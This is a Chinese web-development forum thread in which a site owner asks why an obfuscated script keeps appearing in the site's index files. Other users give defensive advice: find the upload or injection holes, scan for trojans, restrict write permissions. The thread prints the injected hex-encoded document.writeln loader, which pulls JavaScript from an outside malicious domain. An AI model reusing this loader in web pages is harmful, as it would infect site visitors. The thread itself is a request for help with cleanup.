前几天,网站目录下的所有index文件及其包含的文件全部在文件尾加上了以上代码。
之后全部修改了,但找不到是什么原因。
现在越来越严重了,已经在文件头及文件尾或者中间都加了这个代码。
狗狗了一下还是不知所以然,所以向有经验的朋友请教。
这个情况是什么原因导致的呢?
这段代码还原了就是:http://www.59.vc/page/addr.js
遇到这样的情况应该怎么样检查呢?
还有应该怎么样去做防范呢?
-
等级
本版专家分:12966结帖率 100% -
<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>
前几天,网站目录下的所有index文件及其包含的文件全部在文件尾加上了以上代码。
之后全部修改了,但找不到是什么原因。
现在越来越严重了,已经在文件头及文件尾或者中间都加了这个代码。
狗狗了一下还是不知所以然,所以向有经验的朋友请教。
这个情况是什么原因导致的呢?
这段代码还原了就是:http://www.59.vc/page/addr.js
遇到这样的情况应该怎么样检查呢?
还有应该怎么样去做防范呢?展开阅读全文
-
等级
本版专家分:158543勋章
-
- 进士 2008年 总版技术专家分年内排行榜第四
-
-
铜牌
2008年11月 总版技术专家分月排行榜第三
2008年5月 总版技术专家分月排行榜第三
2008年3月 总版技术专家分月排行榜第三
-
-
红花
2009年3月 Web 开发大版内专家分月排行榜第一
2009年2月 Web 开发大版内专家分月排行榜第一
2008年11月 Web 开发大版内专家分月排行榜第一
2008年7月 Web 开发大版内专家分月排行榜第一
2008年6月 Web 开发大版内专家分月排行榜第一
2008年5月 Web 开发大版内专家分月排行榜第一
2008年4月 Web 开发大版内专家分月排行榜第一
2008年3月 Web 开发大版内专家分月排行榜第一
2008年2月 Web 开发大版内专家分月排行榜第一
-
-
黄花
2009年4月 Web 开发大版内专家分月排行榜第二
2009年1月 Web 开发大版内专家分月排行榜第二
2008年12月 Web 开发大版内专家分月排行榜第二
2008年10月 Web 开发大版内专家分月排行榜第二
2008年9月 Web 开发大版内专家分月排行榜第二
2008年8月 Web 开发大版内专家分月排行榜第二
-
-
是因为你的网站被人入侵了
检查你的网站是否有注入和上传漏洞
记得还有一个备份和还原数据库功能的漏洞
检查这些原因,如果这些漏洞都不存在,那就是服务器被人入侵,跨站入侵你的网站了!
-
等级
本版专家分:32112勋章
-
-
蓝花
2008年2月 Web 开发大版内专家分月排行榜第三
2007年12月 Web 开发大版内专家分月排行榜第三
-
-
服务器修复漏洞,杀毒是关键。
至于现有感染的文件,自己写个vbs就可以统一给替换掉了
还可以回复下站点。
-
等级
本版专家分:1348勋章
-
- 签到新秀
-
-
下个淘特ASP木马扫描器 扫一下,在扫之前 先把数据库备份下.
-
版主等级
本版专家分:395855勋章
-
- 签到新秀
-
- 探花 2017年 总版技术专家分年内排行榜第三
-
-
进士
2018年总版新获得的技术专家分排名前十
2013年 总版技术专家分年内排行榜第五
-
-
金牌
2018年5月 总版技术专家分月排行榜第一
2018年4月 总版技术专家分月排行榜第一
2018年2月 总版技术专家分月排行榜第一
2017年8月 总版技术专家分月排行榜第一
-
-
如果物理文件被插入上面的代码,那么应该是代码有漏洞或者中招了
如果物理文件没有,那有可能是被arp了
-
等级
本版专家分:69443勋章
-
-
红花
2006年11月 Web 开发大版内专家分月排行榜第一
2006年10月 Web 开发大版内专家分月排行榜第一
2008年3月 PHP大版内专家分月排行榜第一
-
-
黄花
2005年4月 Web 开发大版内专家分月排行榜第二
2008年4月 Web 开发大版内专家分月排行榜第二
2008年3月 Web 开发大版内专家分月排行榜第二
-
- 蓝花 2005年3月 Web 开发大版内专家分月排行榜第三
-
-
作好服务器安全防范!
-
等级
本版专家分:12966
-
太懒了..还是没有解决掉这个问题...
-
等级
本版专家分:158543勋章
-
- 进士 2008年 总版技术专家分年内排行榜第四
-
-
铜牌
2008年11月 总版技术专家分月排行榜第三
2008年5月 总版技术专家分月排行榜第三
2008年3月 总版技术专家分月排行榜第三
-
-
红花
2009年3月 Web 开发大版内专家分月排行榜第一
2009年2月 Web 开发大版内专家分月排行榜第一
2008年11月 Web 开发大版内专家分月排行榜第一
2008年7月 Web 开发大版内专家分月排行榜第一
2008年6月 Web 开发大版内专家分月排行榜第一
2008年5月 Web 开发大版内专家分月排行榜第一
2008年4月 Web 开发大版内专家分月排行榜第一
2008年3月 Web 开发大版内专家分月排行榜第一
2008年2月 Web 开发大版内专家分月排行榜第一
-
-
黄花
2009年4月 Web 开发大版内专家分月排行榜第二
2009年1月 Web 开发大版内专家分月排行榜第二
2008年12月 Web 开发大版内专家分月排行榜第二
2008年10月 Web 开发大版内专家分月排行榜第二
2008年9月 Web 开发大版内专家分月排行榜第二
2008年8月 Web 开发大版内专家分月排行榜第二
-
-
呵呵,你要懒的话就没人可以帮你了
要不你就出钱让人帮你搞定
-
等级
本版专家分:1353
-
这个不一定是你自己网站的问题,有可能是其他网站存在漏洞,然后上传了木马,导致服务器其他站也感染,
处理方法,把网站目录来宾帐户去掉修改插入权限,只有读取权限就可以了,如果不是自己的服务器,那就有点困难了
因为服务器的问题,只要你网站目录里有修改权限,他就可以插入,这种情况,唯一的我觉得就是在自己所有的页面里加上一段程序来禁止插入显示类似的代码。
最近好多服务器被挂了这个马,我的也被挂了,服务器杀毒 应该会查出一个木马文件,我的就是用瑞星杀出来的,杀不出来只能看下相关的上传目录里是否有其他的可疑文件
-
等级
本版专家分:10 -
楼上的用用瑞星可以清楚吗?现在我用nod32和诺顿都没有查出来。。。
- 防止sql数据库注入js木马解决方案
以前写过一些网站,有漏洞,到了五一、十一这些节日的时候老被注入js木马,但是通过在Global.asax加入一些过滤字符就解决了,但是最近又出现了这种现象,加了Global.asax也没用了,最后通过网友的帮忙和自己在网上找...
- Kindeditor 漏洞导致网站被植入木马文件的解决办法
很多建站公司都在使用Kindeditor开源的图片上传系统,该上传系统是可视化的,采用的开发语言支持asp、aspx、php、jsp,几乎支持了所有的网站可以使用他们的上传系统,对浏览器的兼容以及手机端也是比较不错的,用户使...
- 网站漏洞测试 关于webshell木马后门检测
前段时间我们SINE安全收到客户的渗透测试服务委托,在这之前,客户网站受到攻击,数据被篡改,要求我们对网站进行全面的渗透测试,包括漏洞的检测与测试,逻辑漏洞.垂直水平越权漏洞,文件上传漏洞.等等服务项目,在进行安全...
- thinkcmf漏洞导致网站被挂webshell木马
大概是10月22日开始漏洞入侵,入侵版本为thinkCMFX的所有版本,就是thinkphp3.2版本的thinkcmf 修复方法 将 HomebaseController.class.php 和 AdminbaseController.class.php 类中 display 和 fetch 函数的修饰...
- java webshell_网站漏洞测试 关于webshell木马后门检测
前段时间我们SINE安全收到客户的渗透测试服务委托,在这之前,客户网站受到攻击,数据被篡改,要求我们对网站进行全面的渗透测试,包括漏洞的检测与测试,逻辑漏洞.垂直水平越权漏洞,文件上传漏洞.等等服务项目,在进行安全...
- 网站被黑中毒WebShell木马的解决方案
收到客户的反馈,说运行了一年的网站突然遭到...发现网站目录下面被上传了大量的asp、php,htm的页面,里面的目录也有黑客上传了自己的目录,浏览哪些defalut.asp等方面的页面,就是黑客植入的页面,那要是被用户看见了
- 网站漏洞渗透安全测试重点检测方法
最近渗透测试工作比较多没有空闲的时间来写文章,今天由我们Sine安全的渗透主管来普及一下java的安全测试基础,很多客户想要了解具体js的调用漏洞或提交playload的过程以及是如何拿到最高权限和绕过登录等等执行命令...
- 如何解决网站首页老被黑客篡改并被百度安全中心拦截提示 该页面存在木马病毒的实战过程
2018.6.19当天接到一位新客户反映自己的网站被黑了,网站首页也被黑客篡改了,网站首页被加了一些与网站不相符的内容与加密的代码,导致百度网址安全中心提醒您:该页面可能存在木马病毒!网站在百度的收录与快照也被...
- 正确设置网站文件所有者 防止php网站被挂木马
根据生产环境不断反馈,发现不断有 php网站被挂木马,绝大部分原因是因为权限设置不合理造成。因为服务器软件,或是 php 程序中存在漏洞都是难免的,在这种情况下,如果能正确设置 Linux 网站目录权限, php 进程...
- PHP网站有漏洞怎么修复和查找漏洞
ecshop目前最新版本为4.0,是国内开源的一套商城系统,很多外贸公司,以及电商平台都在使用,正因为使用的人数较多,很多攻击者都在挖掘该网站的漏洞,就在最近ecshop被爆出高危漏洞,该漏洞利用跨站伪造函数,来对...
- java jsp 木马_JSP安全开发之XSS漏洞详解
那么问题来了,为何会出现这种漏洞?出现这种漏洞应该怎么修复?正文1.XSS?XSS?XSS是什么鬼?XSS又叫跨站脚本攻击(Cross Site Scripting),我不会告诉他原本是叫CSS的,但是为了不和我们所用的层叠样式表...
- 文件上传漏洞(一句话木马)-学习笔记
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权 限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马
- 漏洞复现篇——文件上传之js绕过
由于恶意用户可以对前端javascript进行修改或者是通过抓包软件篡改上传的文件,就会导致基于js的校验很容易被绕过。 实验环境: 火狐浏览器 PHPstudy Burp Suite抓包软件 upload-labs-master上传漏洞靶场 首先...
- maccms网站被挂马 根源问题在于SQL注入远程代码漏洞
【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> ...
- 网站漏洞检测之常见安全问题
我们SINE安全在进行Web渗透测试中网站漏洞利用率最高的前五个漏洞。常见漏洞包括注入漏洞、文件上传漏洞、文件包含漏洞、命令执行漏洞、代码执行漏洞、跨站点脚本(XSS...
- 17个方法防止dedeCMS织梦网站被黑挂木马
dede织梦cms系统的程序存在漏洞,黑客攻击方法层出不穷,导致网站经常被黑,被百度安全中心等拦截,影响排名和流量,让站长非常头疼,下面总结一些防止dede织梦cms系统被攻击设置的方法,可有效的防止织梦系统被挂马...
- 知名Node.js组件存在代码注入漏洞
喜欢就关注我们吧!日前,一个被大量下载的 Node.js 组件被发现其含有一个高危的代码注入漏洞。该漏洞被追踪为 CVE-2021-21315,影响了「systeminformation」...
- 常见JS挂马方法及如何防止网站被黑客挂马?
在此,借助seo思维博客的平台,给大家简单的介绍下js挂马的方法及如何防止网站被挂马。 现在最多见的JS挂马方法有两种,一种是直接将JavaScript脚本代码写在网页中,当访问者在浏览网页时,恶意的挂马脚本就会...
- 如何解决网站首页老被黑客篡改并被百度安全中心拦截提示 该页面存在木马病毒的实战过程...
2018.6.19当天接到一位新客户反映自己的网站被黑了,网站首页也被黑客篡改了,网站首页被加了一些与网站不相符的内容与加密的代码,导致百度网址安全中心提醒您:该页面可能存在木马病毒!网站在百度的收录与快照也被...
- 文件上传漏洞——JS绕过
绕过JavaScript验证检测,上传一句话木马。-- 实验工具 BurpSuite、中国菜刀、一句话木马 实验环境 服务器一台(Windows Server 2003)客户机一台(windows Server 2003) 实验步骤 第一步:打开下方网页...
- 利用KindEditor漏洞上传网马
KindEditor是常用的富文本编辑器,里边有上传的功能,如果上传文件类型控制的不好,可能就会给网站带来安全问题,比如上传了网马,可能对我们的服务器就造成了伤害。 首先通过搜索引擎查到使用kindeditor的位置,...
- 萌新之php一句话木马(上传漏洞)
0x00参考文章 https://www.cnblogs.com/wangtanzhi/p/12243206.html ...0x01 什么是一句话木马 <?... ?>...如上就是一句一句话木马,eval函数可以使php将post进去的内容当做代码处理 如果网站在用户上传文件时没
- 文件上传漏洞原理和利用
文件上传 1.前段选择文件,提交文件 2.浏览器形成POST MultiPart报文发送到服务器 ...文件上传漏洞 1.未对上传文件进行严格的验证和过滤时,容易造成动态文件asp/php/jsp等等 2.如果上传的目标目录没...
- java 框架漏洞网站_在分层架构下寻找java web漏洞
web开发应用程序(网站),是目前应用最广泛的程序。...这句话看似废话,实际上却说明了时常被忽略的因素,即:“很多人认为只要我开发web程序没有漏洞,web服务器就安全了”,事实上,并非如此。一个合格的...
- 渗透测试 对APP安全检测与网站木马检测分析
前段时间我们SINE安全收到客户的渗透测试服务委托,在这之前,客户网站受到攻击,数据被篡改,要求我们对网站进行全面的渗透测试,包括漏洞的检测与测试,逻辑漏洞.垂直水平越权漏洞,文件上传漏洞.等等服务项目,在进行安全...
- 【漏洞利用】文件上传漏洞&文件包含漏洞利用
文件包含漏洞利用一句话木马汇总GitHubPHP一句话静态免杀PHP一句话文件上传绕过图片马制作cmd图片头欺骗后缀名绕过前端js验证双后缀名MIME类型绕过文件包含漏洞(上传成功后的利用)文件包含漏洞相关的函数结合PHP伪...
- 如何解决网站可能存在webshell网页木马,阿里云网站木马后门文件提醒
早上刚上班就有新客户咨询我们Sinesafe安全公司反映说收到一条阿里云的短信过来,内容为:网站木马文件提醒018-06-20 09:20:49尊敬的***网:您的虚拟主机中有文件触发了安全防护报警规则,可能存在webshell网页木马...
- 最新织梦cms漏洞之安全设置,有效防护木马(更新至20190920)
织梦CMS在安装完成后,新人往往会直接开始开发使用,忽视了一些安全优化的操作,这样会导致后期整个系统安全系数降低,被黑或者被注入的概率极高,毕竟这世界百分百存在着极多的无聊hacker对全网的网站进行扫描,扫...
- 网站程序有漏洞怎么修复和查找漏洞
ecshop目前最新版本为4.0,是国内开源的一套商城系统,很多外贸公司,以及电商平台都在使用,正因为使用的人数较多,很多攻击者都在挖掘该网站的漏洞,就在最近ecshop被爆出高危漏洞,该漏洞利用跨站伪造函数,来对...
- ctf-web:文件上传漏洞和文件解析漏洞
这次的内容是关于文件上传的漏洞和文件解析的漏洞的内容,在下面我会进行一个关于这两个方面的内容的实际操作以及原理介绍. 其实我一直想学的就是web渗透,但是一直都不知道web渗透都有什么后来才知道居然就是sql注入,...